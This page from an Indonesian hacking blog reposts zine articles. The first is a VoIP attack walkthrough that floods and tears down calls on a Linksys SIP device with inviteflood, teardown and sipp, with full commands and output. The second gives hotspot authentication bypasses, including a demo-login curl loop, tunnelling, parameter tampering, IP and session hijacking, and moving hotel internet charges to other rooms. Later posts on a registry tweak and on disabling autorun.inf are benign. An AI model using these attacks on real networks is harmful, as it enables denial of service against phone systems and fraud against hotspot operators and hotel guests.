   2 SIP/2.0 404 Not Found                     
   3 To: "sipvicious"<sip:100@1.1.1.1>;tag=388074baa08bb653i
   4 From: "sipvicious"<sip:100@1.1.1.1>;tag=63306138303135303133633401373935303131393234
   5 Call-ID: 785522139741125439084511
   6 CSeq: 1 OPTIONS
   7 Via: SIP/2.0/UDP 127.0.1.1:5060;branch=z9hG4bK-3073480069
   8 Server: Linksys/PAP2T-3.1.15(LS) 
   9 Content-Length:0                        
   +-------------------------------------------------------------------------+
   10 | SIP Device        | User Agent               | Fingerprint         |
   11
   +--------------------------------------------------------------------------+
   12 | 192.168.1.80:5060 | Linksys/PAP2T-3.1.15(LS) | Linksys/PAP2T-3.1.15(LS)| 
   +-------------------------------------------------------------------------+
  
  -----------------------------------------------------------------------------------------

   Analisa :
   Pusing ?, santai gan dari hasil fingerprint tersebut kita mendapatkan :
   1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060  
   2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang didapat
      dari sip:100@1.1.1.1
   3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
   4. Pada baris 4, didapatkan juga fromTag number, yaitu :
      63306138303135303133633401373935303131393234 
   5  Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511
   6. Pada baris 7, didapatkan branch, yaitu : z9hG4bK-3073480069
   7. Pada baris 8 menerangkan bahwa Server berbasis: Linksys/PAP2T-3.1.15(LS)                                                      

   Sungguh mangtabs sekali informasi2 tersebut dan sangat berguna dalam
   melakukan penyerangan VoIP.


4. Penyerangan Mari kita lakukan penyerangan, ingat penyerangan ini
hanya untuk pembelajaran saja, segala tindakan destruktif saya tidak
bertanggung jawab.


--] InviteFlood :

Teknik penyerangan yang seolah2 VoIP devices diajak untuk melakukan
komunikasi dengan banyak user.

root@bt:/pentest/voip/inviteflood#
./inviteflood <interface> <ekstensi> <IP_Domain> <IPHost_Target> <JlhPaket_Data>

root@bt:/pentest/voip/inviteflood# ./inviteflood wlan0 100 192.168.1.80 192.168.1.80 10000000

      +-----------------------------------------------+
      |  inviteflood - Version 2.0                    |
      |            June 09, 2006                      |
      |                                               |
      |  source IPv4 addr:port   = 192.168.1.68:9     |
      |  dest   IPv4 addr:port   = 192.168.1.80:5060  |
      |  targeted UA             = 100@192.168.1.80   |
      |                                               |
      |  Flooding destination with 10000000 packets   |
      |  sent: 13165085                               |
      |  exiting...                                   |
      +-----------------------------------------------+

      Hasil selama pengiriman paket data berlangsung :
      * root@bt:/pentest/voip/sipp# ping 192.168.1.80
        PING 192.168.1.80 (192.168.1.80) 56(84) bytes of data.
        (berhenti tanpa respon apapun)
 
      * Port 80 HTTP pun tewas
      * Jalur VoIP tidak bisa dihubungi
      * VoIP Enduser mengalami terputusnya koneksi
      * Semakin banyak jumlah paket dalam yang dikirim berarti
        semakin lama tewasnya VoIP devices target !!

--] tearDown attacking :

Penyerangan dengan melumpuhkan semua client (user) yang terkoneksi pada
VoIP devices.

O iya, pada Backtrack 5 aplikasi teardown tidak tersedia oleh karena
itu anda harus mengambilnya a.k.a download di :
http://www.hackingvoip.com/tools/teardown.tar.gz, jangan lupa aplikasi
ini membutuhkan Ruby 1.8 keatas.

Untuk menggunakan "tearDown" diperlukan hasil analisa dari fingerprint
(proses 3), yaitu :

1. IP perangkat VoIP : 192.168.1.80, dengan SIP port 5060  
2. Pada baris 3, didapatkanlah VoIP number extention yaitu : 100 yang
   didapat dari sip:100@1.1.1.1
3. Pada baris 3, didapatkan juga toTag number, yaitu : 388074baa08bb653i0
4. Pada baris 4, didapatkan juga fromTag number, yaitu :
   63306138303135303133633401373935303131393234
5. Pada baris 5, didapatkan Call-ID, yaitu : 785522139741125439084511 
6. Pada baris 7, didapatkan branch, yaitu : z9hG4bK-3073480069
     
Mari gunakan informasi tersebut sebagai parameter penyerangan dengan
tearDown, sbb :

 root@bt:/pentest/voip/teardown#
 ./teardown <interface> <extention> <sip_proxy> <IP_target> <callID> <fromTag> <toTag>

 ./teardown wlan0 100 192.168.1.80 192.168.1.80 785522139741125439084511 63306138303135303133633401373935303131393234 388074baa08bb653i0

     +-----------------------------------------------------------------------+
     | teardown - Version 1.0                                                |
     |            Feb. 17, 2006                                              |
     |                                                                       |
     | source IPv4 addr:port = 192.168.1.68                                  |
     | dest   IPv4 addr:port = 192.168.1.80                                  |
     | target UA             = 100@192.168.1.80                              |
     | From Tag            = 63306138303135303133633401373935303131393234  |
     | To Tag            = 388074baa08bb653i0                            |
     | Call ID            = 785522139741125439084511                      |
     +-----------------------------------------------------------------------+

     Hasil penyerangan :
     * Jalur komunikasi VoIP yang dipergunakan oleh user terputus !!
   
      
--] SIP protocol attacking :

Penyerangan dengan cara memberikan koneksi "total-call" user yang
berlebihan sehingga SIP tidak lagi mampu memberikan layanan.

   root@bt:/pentest/voip/sipp# ./sipp -sn uac <ip_target>

   root@bt:/pentest/voip/sipp# ./sipp -sn uac 192.168.1.80

   +-------------------------------------------------------------------------------+
   | Resolving remote host '192.168.1.80'... Done.
   |
   +------------------------------ Scenario Screen -------- [1-9]: Change Screen --+
   | Call-rate(length)   Port   Total-time  Total-calls  Remote-host           |
   | 16.0(0 ms)/1.000s   5060      58.96 s          365  192.168.1.80:5060(UDP)       |
   |                                           |
   | 1 new calls during 0.854 s period      0 ms scheduler resolution           |
   | 48 calls (limit 48)                    Peak was 48 calls, after 58 s       |
   | 1 Running, 238 Paused, 26 Woken up                           |
   | 0 dead call msg (discarded)            0 out-of-call msg (discarded)       |
   | 3 open sockets                                   |
   |                                           |
   |                              Messages  Retrans   Timeout   Unexpected-Msg       |
   |    INVITE ---------->         365       436       29               |
   |       100 <----------         0         0         0         288           |
   |       180 <----------         0         0         0         0           |
   |       183 <----------         0         0         0         0           |
   |       200 <----------  E-RTD1 0         0         0         0           |
   |       ACK ---------->         0         0                       |
   |     Pause [      0ms]         0                             0           |
   |       BYE ---------->         0         0         0               |
   |       200 <----------         0         0         0         0           |
   |                                           |
   +------------------------------ Test Terminated --------------------------------+
  
   Hasil penyerangan :
   * Layanan  SIP terganggu bahkan terhenti karena adanya total-call yang
   * berlebihan
     karena limit-calls = 48 sedangkan total-calls sudah mencapai = 365.
  
   * Penyerangan bisa dilipatgandakan dengan menekah tombol "+" (tanda tanda
   * kutip)


Akhirnya selesai sudah tulisan ini saya buat, tiada maksud untuk
menambah kejahatan otak tapi ini adalah sejati2nya ilmu yang memang
siapapun harus mengetahuinya, semoga saja tetap tidak memberikan kotor
pada otak Anda semuanya.  Selamat belajar Indonesia...!!!!
More aboutECHO MAGAZINE VOLUME IX, ISSUE XXIV, PHILE 0x06

ECHO|ZINE, volume 5 issue 16

Diposting oleh blacklokip on Selasa, 24 Januari 2012

Wireless Hotspot: The Hacker's Playground (Bagian I)
by willhackforbandwidth



---//  Pendahuluan

Wireless hotspot merujuk pada implementasi jaringan wireless (nirkabel)
yang memanfaatkan protokol IEEE 802.11x untuk keperluan akses Internet
publik. Implementasi jaringan wireless ini dapat digunakan tanpa bayar,
biasanya akses diberikan oleh penyedia layanan untuk keperluan promosi,
atau berbayar.

Di kota-kota besar di Indonesia, seperti Jakarta, Bandung, dan Surabaya,
wireless hotspot dapat ditemukan di mall, plaza, hotel, atau airport.
Dengan ekspetasi pengguna yang beragam, dari geek sampai mereka yang
gagap teknologi, maka wireless hotspot didesain untuk memberikan kemudahan
dalam penggunaan. Oleh karena itu, kebanyakan wireless hotspot tidak
memberikan perlindungan penuh terhadap penyalahgunaan jaringan wireless.

Tulisan ini merupakan uraian panjang dari presentasi teknis yang pernah
saya bawakan dengan judul yang sama pada konferensi keamanan informasi
dan hacking internasional di Kuala Lumpur[1], Malaysia tahun 2005 dan
Prague[2], Czech Republic tahun 2006. Gunakan keajaiban mesin pencari
online untuk mengetahui lebih lanjut mengenai saya.

Tulisan ini terbagi menjadi dua bagian. Bagian kedua akan dipublikasikan
pada rilis echo|zine mendatang.


---//  Menggunakan Wireless Hotspot

Jika Anda belum pernah memanfaatkan layanan wireless hotspot, maka
langkah-langkah berikut dapat Anda lakukan ketika Anda berada dalam
jangkauan akses wireless hotspot.

    1. Siapkan device yang akan digunakan untuk mengakses wireless hotspot.
       Device dapat berupa laptop, PDA, atau telepon selular.
   
    2. Asosiasikan device Anda pada hotspot SSID (Service Set Identifier)
       untuk mendapatkan konfigurasi jaringan. Biasanya jaringan wireless
       hotspot menggunakan layanan DHCP untuk keperluan ini.
   
    3. Gunakan web browser untuk mulai mengakses Internet. Jika Anda
       mendapatkan tampilan web yang meminta login username dan password
       (terkadang cukup password saja), maka Anda harus memasukan username
       dan password yang sudah disiapkan. Jika Anda dapat langsung
       menggunakan akses Internet, Anda beruntung. Dan mungkin Anda tidak
       perlu membaca kelanjutan dari artikel ini. Namun kalau Anda hanya
       dapat mengakses beberapa website tertentu saja, besar kemungkinan
       Anda akan diminta username dan password untuk mengakses website
       yang lainnya.
   
    4. Jika Anda sudah memasukkan username dan password, dan berhasil
       terautentikasi. Anda selanjutnya dapat mengakses Internet sampai
       kredit akses Anda habis atau perhitungan akses dihitung setelah Anda
       menggunakan akses Internet (ini biasanya berlaku bagi mereka yang
       juga adalah pelanggan penyedia layanan Internet).


---//  Mendapatkan Akses

Beberapa cara yang dapat dilakukan untuk mendapatkan akses wireless hotspot,
tergantung dari penyedia layanan, namun secara garis besar Anda dapat
melakukan hal-hal berikut:

    1. Membeli prepaid card. Penyedia layanan seperti CBN, Indosat, dan
       BizNet menyediakan prepaid card dengan nominal tertentu.
   
    2. Membayar hak akses dengan kartu kredit. Berlaku jika penyedia layanan
       memberikan pilihan ini. Saya hanya menemukan fitur ini pada wireless
       hotspot di luar negeri.
      
    3. Registrasi via SMS. Penyedia layanan wireless hotspot yang juga 
       penyedia layanan telekomunikasi selular bergerak biasanya memberikan
       kemudahan pada pelanggannya. Hak akses online pada wireless hotspot
       dapat ditukar dengan nilai kredit kartu telepon selular pra-bayar.
       Saya pernah menemukan Indosat memberikan layanan ini.
      
    4. Mengalihkan tagihan online pada tagihan kamar hotel. Ini berlaku
       jika Anda menggunakan layanan wireless hotspot dari kamar hotel
       dimana harga yang harus dibayarkan nanti seringkali jauh lebih
       mahal. Sebagai contoh, M@giNET bekerja sama dengan hotel Westin
       di Kuala Lumpur, untuk memberikan layanan wireless akses bagi mereka
       yang menginap di hotel tersebut.
      
    5. Melakukan aktivitas social engineering untuk mendapatkan username
       dan password. Silakan mengira-ngira sendiri karena saya tidak akan
       membahas hal ini.

    6. Mencari jalan keluar sendiri untuk mendapatkan username dan password
       atau untuk langsung dapat menggunakan layanan akses Internet.
       Beberapa trik akan dijelaskan pada bagian lain di artikel ini.


---//  Analisis Desain Wireless Hotspot

Beberapa hal yang saya berhasil saya simpulkan dari sejumlah implementasi wireless
hotspot yang telah saya coba, antara lain:

    1. Tidak adanya standarisasi untuk setup sebuah hotspot. Dengan kata
       lain, setup jaringan dari penyedia layanan akan berbeda dengan
       penyedia layanan yang lain. Hal lain yang berpengaruh adalah
       pemilihan produk.
      
    2. Banyak dari penyedia layanan wireless hotspot yang memberikan akses
       roaming, memungkinkan pengguna untuk mengakses layanan di tempat
       yang berbeda asalkan ada layanan dari penyedia yang dimaksud.
       Sebagai contoh, jika Anda memiliki hak akses untuk layanan wireless
       hotspot yang disediakan oleh Indosat, maka Anda dapat mengakses
       dilebih dari 30 tempat, dengan akses point berjumlah lebih dari
       190 buah. Dan sebagai informasi tambahan, kesemua akses point
       tersebut semuanya terhubung dan dikontrol dari pusat.

    3. Autentikasi biasanya digunakan untuk keperluan akses Internet.
       Yang berarti jika Anda terhubung ke sebuah akses point wireless
       hotspot namun tidak ingin mendapatkan akses Internet, Anda masih
       dapat menggunakan jaringan wireless secara lokal dan berhubungan
       dengan pengguna jaringan wireless yang lain (jika dan hanya jika
       penyedia layanan mengijinkan hal ini).
   
    4. Untuk keperluan autentikasi, penyedia layanan biasanya akan
       menyediakan Internet gateway (yang biasanya terdapat web server,
       DNS server, database server, dan mail server di dalamnya) dan satu
       atau lebih akses point. Beberapa produk yang sering digunakan
       sebagai Internet gateway untuk layanan hotspot antara lain
       diproduksi oleh ANTLabs (seperti yang digunakan oleh Indosat dan
       CBN), Nomadix (digunakan oleh M@giNET), perangkat lunak gratis
       NoCatsAuth atau yang serupa (seperti yang digunakan oleh Melsa).

    5. Seringkali tidak ditemukan segregasi jaringan untuk pengguna. Baik
       bagi mereka yang belum terautentikasi maupun yang belum. Hal ini
       memungkinkan seseorang melakukan aktivitas hacking terhadap
       pengguna layanan wireless hotspot yang lain.

    6. Juga sering ditemukan para penyedia layanan wireless (ataupun
       produsen produk Internet gateway) menggunakan aplikasi yang sudah
       out-of-date. Sebagai contoh, sebuah produk ANTLabs menggunakan
       Red Hat Linux release 6.2 (Zoot) sebagai sistem operasi.
       Terhitung perangkat lunak yang digunakan seperti MySQL, arpd, dan
       Apache, juga out-of-date.


---//  Mengakali Proses Autentikasi Wireless Hotspot

Ada banyak hal yang seseorang dapat lakukan untuk mengakali proses
autentikasi. Beberapa cara yang dibahas dalam artikel ini hanya mencakup
sebagian kecil aspek yang memanfaatkan kelemahan desain dari sebuah
wireless hotspot gateway. Mengingat bahwa materi sudah pernah
dipresentasikan di depan publik, besar kemungkinan penyedia layanan
maupun vendor dari produk-produk yang terkena dampaknya sudah
memperbaiki celah-celah yang dimaksud.

Sebagai pemberitahuan, tidak ada nama vendor yang akan diasosiasikan
dengan celah yang saya temukan. Silakan mengira-ngira sendiri. Dan
trik-trik yang dijelaskan hanya dapat direplikasikan jika Anda berada
dalam environment sistem operasi berbasis Unix/Linux (kebetulan saya
menggunakan Mac OS X).


    1. Memanfaatkan demo account.
   
       Banyak penyedia layanan yang berbaik-hati memberikan kesempatan
       bagi calon pengguna untuk dapat mengakses Internet dalam kurun
       waktu yang dibatasi. Pada halaman autentikasi biasanya disebutkan
       username dan password untuk keperluan ujicoba.
      
       Seseorang yang menggunakan account ujicoba/demo harus melakukan
       autentikasi ulang setelah masa penggunaan berakhir. Namun hal
       tersebut dapat dilakukan secara otomatis dengan menggunakan script
       seperti ini.
      
      ---------------------------------------------------------------------
       #!/bin/sh
      
       while sleep 3;
       do
               curl --data
                   "username=demo&password=demo&submitForm=login"
                   "https://server:port/goform/HtmlLoginRequest";
       done
      ---------------------------------------------------------------------
      
    2. Menggunakan tunneling.
   
       Beberapa implementasi hotspot dapat diakali dengan memanfaatkan
       metode tunneling. Implementasi yang dimaksud adalah implementasi
       yang tidak melakukan pemblokiran terhadap port atau protokol
       tertentu. 0x05 
      
       Sebagai contoh, sebuah hotspot hanya melakukan pengalihan untuk
       semua query HTTP dan HTTPS ke halaman login autentikasi bagi
       pengguna yang belum terautentikasi. Anda dapat menggunakan
       socks-tunneling via SSH karena port yang digunakan untuk SSH tidak
       terfilter. Anda dapat menambahkan option 'DynamicForward' pada
       konfigurasi SSH user Anda (lihat file ~/.ssh/config).
      
       --------------------------------------------------------------------
       ...
       Host titanium
               Hostname titanium.justanotherrandomdomain.com
               Port 22
               User whfb
               DynamicForward 22344
       ...
       --------------------------------------------------------------------
      
       Jika Anda sudah melakukan koneksi SSH ke host titanium, maka secara
       otomatis, port 22344 akan terbuka. Anda dapat menambahkan IP
       127.0.0.1 dan port 22344 pada konfigurasi jaringan di web browser
       Anda untuk pilihan SOCKS proxy.
      
       Namun cara yang disebutkan di atas tidak selalu berhasil karena
       gateway melakukan pengalihan pada semua port TCP dan UDP. Untuk 
       mengakali kondisi tersebut, jika dapat memanfaatkan DNS tunneling.
       Mengapa protokol DNS? Karena sebagian besar penyedia layanan tidak 
       melakukan pemblokiran atau pengalihan untuk query DNS.
      
       Silakan merujuk pada referensi DNS Tunneling[3][4][5][6][7].
      
    3. Memanfaatkan celah pada aplikasi web portal Internet gateway.
   
       Trik berikut saya temukan ketika saya yang kebetulan mendapatkan
       kesempatan untuk menginap di salah satu hotel terkenal dan menemukan
       adanya layanan wireless hotspot yang terdapat di lobby.
      
       Pada halaman autentikasi, saya diberikan beberapa pilihan untuk
       melakukan pembayaran, antara lain:
      
       a. login menggunakan username dan password dari pre-paid yang dapat
          dibeli di lobby,
       b. login menggunakan username dan password dari layanan iPass dan
          Boingo
      
       Setelah mengamati benar source-code dari halaman web yang digunakan
       untuk keperluan autentikasi, saya melihat adanya kejanggalan dimana
       pilihan a mempunyai billing_method_id adalah 2, dan pilihan b
       mempunyai billing _method_id adalah 3. Yang jadi pertanyaan saya
       waktu itu adalah pilihan apa yang mempunyai billing_method_id
       adalah 1. Dengan niatan mencoba-coba, saya lalu mengganti variable
       query billing_method_id dengan nilai 1, ternyata saya dapat
       langsung mengakses Internet.
      
       --------------------------------------------------------------------
       http://host/defaultportal/check_form.cgi?&billing_method_id=1
       --------------------------------------------------------------------

       Belakangan hari setelah saya berkesempatan meminjam produk yang
       digunakan sebagai Internet gateway tersebut, saya mengetahui bahwa
       billing_method_id dengan nilai 1 adalah pilihan untuk melakukan
       penagihan pada kamar. Sesuatu yang tidak mungkin dilakukan karena
       saya mengaksesnya dengan menggunakan wireless dari lobby. Setelah
       berkorespondensi dengan technical support vendor produk yang
       dimaksud, saya baru mengetahui bahwa pilihan tersebut hanya
       efektif jika pelanggan menggunakan kabel dan bukan wireless.
      
    4. Mengganti IP address
   
       Ditemukan beberapa implementasi wireless hotspot yang diketahui
       membagi alokasi IP address pada pengguna yang belum terautentikasi
       dan user yang sudah terautentikasi. Setelah pengguna berhasil
       melewati proses autentikasi, gateway akan mengingat MAC address
       Anda dan memberikan IP address baru (pada subnet yang baru) bagi
       pengguna tersebut.
      
       Menggunakan perangkat lunak packet sniffer seperti tcpdump atau 
       ethereal (sekarang wireshark), Anda dapat mengetahui IP address apa
       saja yang melintasi jaringan wireless Anda. Anda dapat mengira-ngira
       sendiri alokasi IP address yang 'baru' berikut dengan netmask-nya.
      
       Sebagai contoh, jika belum terautentikasi Anda mendapatkan IP
       address 10.0.0.14 dengan netmask 255.255.255.0, dan setelah Anda
       terautentikasi, Anda mendapatkan IP address 10.0.1.18 dengan
       netmask 255.255.255.0.

       Jika Anda tidak ingin melakukan proses autentikasi, Anda cukup
       mengkonfigur IP Address Anda pada range network pengguna yang sudah
       terautentikasi.

    5. Piggyjacking
   
       Saya mendefinisikan piggyjacking sebagai aktivitas untuk mendapatkan
       akses pada sebuah sesi akses wireless dengan mengambil-alih sesi
       yang sudah terlebih dahulu terautentikasi untuk mendapatkan akses
       Internet.
      
       Untuk melakukannya, Anda membutuhkan informasi:
       - IP address dan MAC address pengguna yang sudah terautentikasi
       - IP address gateway
      
       Anda dapat merujuk pada presentasi Dean Pierce, Brandon Edwards &
       Anthony Lineberry yang diberikan di DEFCON 13[8] untuk penggunaan
     $3B  perangkat lunak 'pul'. Jika Anda ingin melakukan dengan metode
       manual, Anda dapat mengikuti prosedur yang disebutkan pada
       point 4 di atas.

    6. SQL Injection pada aplikasi portal gateway

       Beberapa hotspot ternyata dapat diakali dengan memanfaatkan teknik
       SQL injection. Saya pikir tidak perlu menjelaskan lebih jauh
       mengenai teknik ini karena sudah seringkali dibahas. Tidak hanya
       untuk mem-by-pass akses Internet, teknik ini juga dapat mem-by-pass
       autentikasi administrative page.

    7. Memindahkan tagihan ke kamar lain.
   
       Jika Anda beruntung menginap pada hotel yang memberikan layanan
       Internet berbayar menggunakan kabel pada kamar hotel. Anda mungkin
       dapat menerapkan trik ini. Trik berikut ini hanya dapat dilakukan
       pada jaringan kabel pada hotel (tidak berhubungan dengan wireless),
       namun saya bahas di sini karena produk gateway yang digunakan sama
       dengan layanan wireless hotspot.
      
       Anda mungkin dapat 'menyusahkan' orang lain dengan mengalihkan
       tagihan Internet kamar Anda atau mengalihannya ke kamar kosong.
      
       Sebagai contoh, Anda dapat memodifikasi query HTTP seperti berikut
       ini
       --------------------------------------------------------------------
       http://HOTSPOT_GATEWAY/mlcbb/mlc/welcome.asp?UI=012345&
       UURL=http://BILLING_SERVER/userok.htm&MA=00AABBCCDDEE&RN=1234&
       http://google.com/&SC=12345
       --------------------------------------------------------------------
       Anda cukup menganti nilai 00AABBCCDDEE (MAC address) dan 1234
       (nomor kamar). Tagihan akan ditujukan pada kamar baru jika kamar
       tersebut ada.

       Untuk amannya, saya menyarankan Anda mencari informasi nomor ruangan       
       yang digunakan untuk keperluan publik seperti ballroom atau lobby.


---//  Penutup Bagian I

Seperti yang sudah disinggung di atas, materi yang dibahas pada artikel ini
hanya setengah dari keseluruhan materi. Pada bagian kedua akan dibahas
mengenai isu bocornya identitas pengguna yang menggunakan wireless hotspot,
dan pemanfaatan teknik 'eviltwin' untuk mengelabui pengguna serta isu lain
yang berhubungan dengan penggunaan wireless hotspot.

Jika Anda adalah pengguna dan menemukan kesulitan dalam mereplikasikan
teknik-teknik yang disebutkan, saya hanya dapat mengatakan bahwa artikel
ini tidak ditujukan untuk memberikan panduan mudah hacking wireless
hotspot. Ide dan trik yang dibahas dapat Anda kembangkan sendiri.

Bila Anda melakukan tindakan berdasarkan teknik-teknik yang dijelaskan
di atas dan kemudian menghadapi masalah hukum. Anda adalah orang bodoh.



---//  Referensi

1). Hack In The Box Security Conference 2005,
    http://conference.hackinthebox.org/

2). IT-Underground Prague 2006,
    http://itunderground.org/en/conferences/it_underground.html   
      
3). NSTX (IP-over-DNS) Howto,
    http://thomer.com/howtos/nstx.html      
      
4). DNS tunneling,
    http://www.daemon.be/maarten/dnstunnel.html

5). DNStunnel.de - Free DNS Tunneling Service,
    http://dnstunnel.de/

6). Public Access to Tor via DNS,
    http://afs.eecs.harvard.edu/~goodell/blossom/tor-via-dns.html

7). Quick tunneling IP over DNS guide,
    http://www.digitalsec.net/stuff/texts/dns-tunnelingv0.2-en.txt

8). Bypassing Authenticated Wireless Networks,
    http://www.defcon.org/images/defcon-13/dc13-presentations/
    DC_13-Pierce-Edwards-Lineberry/DC_13-Pierce-Edwards-Lineberry.pdf

More aboutECHO|ZINE, volume 5 issue 16

Dolanan Regedit

Diposting oleh blacklokip

Sudah lama nggak buka Blog.ku ini, langsung dehh.....
Saat ini saya akan membahas cara mempercepat Boot dan Kinerja Windows melalui Regedit,
Apakah kamu perhatikan sesaat setelah diinstal, komputer terasa gesit, cepat untuk membuka aplikasi, dan sigap ketika dipakai bekerja maupun banyak program yang dijalankan berbarengan.
 Lambatnya komputer diakibatkan beberapa hal. Contohnya nih, hal yang bikin boot berjalan lambat adalah banyaknya program yang dijalankan pada saat komputer dinyalakan. Program-program tersebut masuk ke dalam Start-up Windows.Aplikasi yang dijalankan pada saat komputer dijalankan akan berada di “latar belakang” alias jalan tanpa ada jendela program. Semua program yang sedang berjalan butuh memori.
Nah karena banyak program yang jalan meski jendelanya tak tampak, komputer pun melambat. Itu baru sekedar ringkasan. Ini adalah salah satu cara untuk mempercepat kinerja dan boot windows, cekidot sob!!

Pertama, masukkan source code ini ke notepad sobat:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"="0"
"HungAppTimeout"="100"
"AutoEndTasks"="1"
"WaitToKillAppTimeout"="100"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control]
"WaitToKillServiceTimeout"="100"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control]
"WaitToKillServiceTimeout"="100"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Control]
"WaitToKillServiceTimeout"="100"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"LargeSystemCache"=dword:00000001
"DisablePagingExecutive"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndexCommon]
"Startup Delay"=dword:00009c40
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\AlwaysUnloadDll]
@="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]
"EnableSuperfetch"=dword:00000001
"EnablePrefetcher"=dword:00000001
[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics]
"MinAnimate"="0"

 Setelah itu, save dengan format .reg, dan klik 2 kali, trus OK!! Setelah itu restart, dan “feel the new windows boot and performance” SEKIAN TERIMA KASIH!!
More aboutDolanan Regedit

Mengenal Lebih Dekat Autorun.inf

Diposting oleh blacklokip on Jumat, 05 Agustus 2011

Mungkin sebagian besar kita sudah mengetahui apa itu Autorun.inf, tetapi saya yakin masih banyak juga yang belum tahu atau masih kurang tepat memahami tentang file autorun.inf ini. Hal ini terbukti masih sering kita dengan orang bertanya tentang virus Autorun.Inf, bagaimana cara menghapusnya dan lain-lainnya.
Kali ini akan dibahas sedikit lebih dalam mengenai Autorun.inf, semoga yang sudah tahu semakin tahu dan yang belum tahu mulai sedikit paham tentang autorun.inf, baik struktur yang ada didalamnya, manfaat, bahaya dan cara mematikan autorun.inf.
Autorun atau autoplay merupakan fasilitas di sistem operasi yang berfungsi menjalankan file secara otomatis ketika media seperti CD-ROM, DVD-ROM, Flash disk dan lainnya di masukkan/pasang di komputer. Sehingga ketika berbagai media tersebut dimasukkan, tanpa kita menjalankan apapun, ada program yang akan otomatis berjalan sendiri. Fitur ini biasa dimanfaatkan dalam CD Driver yang disertakan ketika membeli motherboard / VGA. Tetapi saat ini tidak dipungkiri malah dimanfaatkan sebagai media penyebar virus, terutama melalui flashdisk. Apalagi dengan penggunaan flashdisk yang sudah seperti jamur di musim hujan..
Sedangkan file Autorun.inf sendiri merupakan file yang berisi instruksi tertentu, tentang apa yang otomatis dijalankan ketika media seperti flashdisk/CD dimasukkan ke komputer. Instruksi ini dapat berupa perintah untuk menjalankan file exe.


STRUKTUR AUTORUN.INF
Autorun.inf hanya berupa text file biasa dan bisa dibuka dengan text editor seperti notepad. Ada baris-baris kode yang umum dijumpai didalamnya. Sebenarnya ada beberapa bagian (Key) yang bisa ditulis di autorun, yaitu [Autorun], [Content], [ExclusiveContentPaths], [IgnoreContentPaths], dan [DeviceInstall]. Disini hanya akan dibahas beberapa struktur [Autorun] saja, karena memang ini yang sering kita lihat.
 
Open
Perintah ini akan otomatis menjalankan file exe yang ada. Misalnya sebagai berikut
Open=setup.exe ( akan menjalankan file setup.exe yang berada satu direktory dengan autorun /root direktory)
Open=virus\inivirus.exe (akan menjalankan file inivius.exe yang ada di folder virus)
 
action
Untuk menampilkan nama/pesan ketika muncul Autoplay dialog.
 
shellexecute
Hampir sama dengan perintah Open, tetapi bisa juga untuk selain file exe, termasuk link website dan bisa ditambah dengan parameter sesudah nama file. Contoh :
shellexecute=http:/indonesia-buanget.blogspot.com
action=Kunjungi http:/indonesia-buanget.blogspot.com

icon
Untuk memberi icon di media yang dipakai (yang berisi autorun.inf). Bisa menggunakan file .ico, .exe .dll maupun .bmp. Contohnya :
icon=MyProg.exe,1
icon=myicon.ico

label
untuk memberi label (nama) pada media yang digunakan (nama drive CD-ROM atau flashdisk yang berisi autorun.inf tersebut.
label=Flashdisk Hebat

shell
Untuk menampilkan menu ketika klik kanan drive yang bersangkutan. Misalnya contoh berikut :
shell\menu baru=buka file contoh
shell\menu-baru\command=notepad "file-contoh.txt"
shell=menu baru
 
dengan kode diatas, maka ketika kita klik kanan drive-nya akan muncul menu “buka file contoh”. jika baris pertama dihilangkan maka menunya “menu baru”. dan ketika menu tersebut di klik akan dijalankan notepad dengan membuka file “file-contoh.txt”. Jadi ketika baris kode tersebut saling berhubungan. Jika baris 1 da 3 sama-sama digunakan maka baris 3 akan diabaikan.
 
Selanjutnya ketika fasilitas Autorun di hilangkan / di non aktifkan, maka program di open dan shellexecute tidak akan berjalan secara otomatis. Tetapi label, icon dan menu klik kanan tetap akan tampil. Agar lebih aman, maka kita bisa me-nonaktifkan fasilitas Autorun ini. bagaimana caranya ? Berikut penjelasannya :

Berbagai cara Me-nonaktifkan fasilitas Autorun di Windows
•    Menekan dan menahan tombol Shift ketika kita memasang/memasukkan  Flashdisk/CD-ROM ( tidak berjalan di windows Vista).
•    Me-nonaktifkan melalui Registry
•    Memanfaatkan fasilitas gpedit.msc

Me-nonaktifkan Autorun melalui Registry
1.    Buka Registry Editor, Start Menu > Run, ketikkan Regedit
2.    Buka Key berikut : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3.    Jika ada Key NoDriveTypeAutoRun, maka double klik dan isi nilainya dengan salah satu nilai berikut :
Decimal
Hexadecimal
Efek yang dihasilkan
181
b5
Autorun tidak berjalan sama ekali untuk semua media
149
95
Autorun hanya aktif untuk CD-ROM / DVD-ROM
177
b1
Autorun hanya aktif untuk flash drive (flashdisk dan sejenisnya)
145
91
Autorun aktif untuk semua media
4.    Jika Key NoDriveTypeAutoRun tidak ada maka buak dengan cara klik kanan, pilih New > Binary Value. Kemudian beri nama NoDriveTypeAutoRun, dan isi nilainya ( double klik) dengan nilai diatas.
5.    Langkah diatas hanya berefek di User yang bersangkutan. Agar berefek di semua pengguna komputer, lakukan hal yang sama untuk Key : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\

Memanfaatkan fasilitas gpedit.msc

Ini bisa dilakukan untuk pengguna Windows 2000, Server 2003 dan Windows XP Professional, langkah-langkahnya sebagai berikut :
1.    Dari Start Menu > Run, ketikkan gpedit.msc lalu klik OK.
2.    Pilih Computer Configuration > Administrative Template dan klik System
3.    Di panel Settings, klik kanan Turn off Autoplay dan klik Properties ( di windows 2000, namanya Disable Autoplay)
4.    Klik Enabled kemudian pilih All drives di box Turn off Autoplay untuk mematikan fasilitas autorun di semua drive.
5.    Klik OK, dan tutup window dialog tersebut.
6.    Restart Komputer.

